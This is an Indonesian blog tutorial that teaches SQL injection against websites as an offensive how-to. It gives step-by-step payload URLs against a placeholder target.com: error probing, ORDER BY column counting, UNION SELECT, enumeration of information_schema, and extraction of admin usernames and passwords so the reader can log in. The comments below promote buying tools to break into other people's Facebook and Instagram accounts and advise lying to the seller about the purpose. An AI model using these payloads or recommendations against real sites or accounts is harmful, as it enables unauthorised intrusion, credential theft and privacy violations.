Top Ad unit 728 × 90

Terupdate

recent
Home Kumpulan Tutorial Cara hack website menggunakan aplikasi SQL injection

Cara hack website menggunakan aplikasi SQL injection

Cara hack website menggunakan 
aplikasi SQL injection

Sebelum ke postingan hack., alangkah baiknya anda baca catatan saya berikut ini .
penulis tidak bertanggung jawab atas efek pada postingan kali ini.,
penulis menulis artikel ini bertujuan untuk pengetahuan saja.

Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ok langsung saja perhatikan langkah langkah nya berikut ini,

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–“. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9”
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3” maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
ok sekarang bisa diliat username sama passwordnya Tinggal login Cari yang asik terus. Terserah ente.

Demikian lah cara hack website menggunakan aplikasi SQL injection.,
semoga bermanfaat. .

Wasalamualaikum Wr.Wb.


Cara hack website menggunakan aplikasi SQL injection Reviewed by Unknown on 12.43.00 Rating: 5

Tags :

About Sweetheme

Number of Entries : 35

We are Developers Team do our best to create beautiful work for our clients. Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s.

2 komentar:

  1. andini14 Maret 2022 pukul 02.29

    Oowh yg buat hack atau bobol akun fb atau instagram orang lain gitu ya kak?
    Kmrn lusa aku baru beli sih yg buat hack fb orang gitu, di MATAINDO.com itu
    Bnyak sih, ada aplikasi hack fb, instagram, twitter, dll..
    Hehe manteb banget sih bisa ngintip katasandi akun fb orang, bisa masuk ke fb orang, liatin inbox ama foto"nya wkwkwk
    Eh cuman pas beli di aplikasi hack fb di MATAINDO.com itu ya harus pinter" kita alasan aja, jngn smpai bilang mau beli buat digunain yg gak baik, bilang aja mau gunain buat benahin akun sndiri yg kena hack gitu...
    Ntar klo udah nerima aplikasinya dri MATAINDO.com itu sih baru terserah dipake buat apa wkwkwk

    BalasHapus
    Balasan
    1. dora14 April 2022 pukul 05.19

      thanks kak andini... apk hack yg di Mataindo.com manjur mantabbbbbb

      Hapus

Langganan: Posting Komentar (Atom)
All Rights Reserved by solvingdroid © 2014 - 2015
Designed by Bthemes4u

Formulir Kontak

Nama

Email *

Pesan *

Diberdayakan oleh Blogger.